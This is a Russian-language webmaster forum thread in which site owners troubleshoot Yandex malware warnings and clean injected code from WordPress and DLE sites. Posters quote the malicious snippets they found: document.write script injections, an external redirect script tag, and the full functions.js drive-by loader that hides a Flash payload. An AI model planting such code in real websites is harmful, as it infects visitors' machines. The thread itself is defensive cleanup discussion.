Яндекс нашел вирус на сайте

Уважаемое сообщество, подскажите пожалуйста еще такую вещь.

Что именно означает у Яндекса "перепроверка с такого-то по такое-то число не удалась"?

У меня так второй раз уже, сначала с 16.10.13 по 18.10.13 не удалась, теперь висит надпись в вебмастере, что уже с "16.10.13 по 20.10.13 не удалась. Очередная перепроверка займёт несколько дней."

Бот от Яндекса заходил и 17-го, и 19-го числа... Т.е. был на сайте.

Но дата последней проверки в вебмастере так и стоит 16.10.13😡

Письмо с просьбой перепроверить отправил еще 18-го, спустя двое суток получил Платоновский ответ, что мол, спасибо, пересмотрим в ближайшее время, и сообщим,... оставте свое мнение о нашем ответе...

Ничего не понимаю.

Здравствуйте. Подскажите решение. Проблема с вирусом troj/jsredir-mh.

Удалил все лишние файлы вируса: js скрипт, swf ролик, php файлы.

Но строчка в конец файла все равно продолжает дописываться, раз в несколько дней, хотя вирусные файлы не появляются.

Вот такая строчка дописывается: ;document.write(\"<scr\"+\"ipt src=\'/includes/js/tabs/prototype.js\'><\"+\"/script>\");

Пароли FTP и в админку сменил.

Значит есть шелл в файлах сайта, и хакер просто руками дописывает левый код

dqdmitry,

Жди.Бывает что до 7 дней ждал окончания проверки,после окончания чистки от вируса.

Вирус так и не смог удалить, т.к. после вырезки кодов, сайт частично утратил функционал. Восстановил из резервной копии. Сайт существенно утратил позиции Яндекс и Гугл, посещаемость упала более чем в 50 раз. Старые статьи пока не проиндексированы.

Вывод: вирус чрезвычайно эффективен, с точки зрения борьбы с конкурентами.

Слежу за изменяющимися файлами.

10.11 пока неизвестно как были добавлены файлы:

Файл Измененные Хеш файла

wp-content/languages/admin-ru_RU.php Sunday November 10th, 2013 at 9:49 am UTC 284a7a416f8d7fb14679b6e3f7fe5b4f

wp-content/themes/twentyeleven/config.inc.php Sunday November 10th, 2013 at 9:49 am UTC b8a36114ad041c405754a42bd374967e

wp-content/themes/twentyten/config.inc.php Sunday November 10th, 2013 at 9:49 am UTC 93cdc259c3d1d1eb19bac5439940f062

Удалил их вручную.

11.11. заблокировал сайт, который пытался открыть удаленные файлы:

110.85.101.152(you can check the host at http://ip-adress.com/ip_tracer/110.85.101.152).

А нанять специалиста не дешевле будет?

1. Не по теме.

2. Не конструктивно (нет цены и условий)

3. Ставлю и администрирую не первый сайт, на разных движках, такое явление впервые, самому таки интересно побороть..

Версия вп какая? Просто интересно.

у меня тоже самое. До этого три дня яша проверял сайт нормально, но все еще находил вирус, насовали в ДЛЕ немеряно дряни, пока вычистила 3 перепроверки и прошло, а 4-ю все...как сглазали..не удалась пернепроверка и всё.

Напишите у кого такое было..как долго не мог перепроверить и платоны отписали ли кому-то о причинах?

Неделю назад появилось в яндексе, что на сайте вирусный мобильный редирект

Яндекс сообщает следующее - При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

<script src="//ad.nwindscore.net/ldr.php?194288529"></script>

с помощью которого происходит перенаправление пользователей с мобильных устройств на вредоносную цель: getpdainfo.com .

На сайте и БД, потратив кучу времени ничего не найдено, айболитом тоже.

Обнаружено, что больше трети сайтов с этого же айпи также забанены яндексом с этим же мобильным редиректом.

Хостер как бы разбирается, но сегодня прислали отмазку, что типа виноват Яндекс и проклятые ифреймы - не понятно для кого это они пишут вообще. Я снова отправил им все данные. Боремся.

Хостер - украинский

---------- Добавлено 16.11.2013 в 12:20 ----------

только что нашел - http://10kilogramm.ru/mobilnyj-redirekt-a-chto-esli-virus-ne-na-sajte.php

точно мой случай - обратите внимание, сколько человек боролся с хостером

16.11.13 на сайте антивирус avast обнаружил вирус, в файле functions.js.

Вот содержимое файла:

function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/wp-includes/images/crystal/video.swf";var div=document.createElement('div');div.innerHTML='<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';div.innerHTML+='<param name="allowScriptAccess" value="always" \/>';div.innerHTML+='<param name="movie" value="'+counter+'" \/>';div.innerHTML+='<embed id="dummy2" name="dummy2" src="'+counter+'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';div.innerHTML+='<\/object>';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();

Данный файл использовал файл video.swf.

Ссылка на functions.js.(его вызов) была прописана в navigation.js, в виде кода ;

document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>");

Файлы

wp-includes\images\smilies\functions.js

wp-includes\images\crystal\video.swf

и ссылка document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>"); из файла wp-content\themes\twentytwelve\js\navigation.js были удалены.

В оригинальной теме не было файла wp-includes\images\crystal\video.php, он был также удален.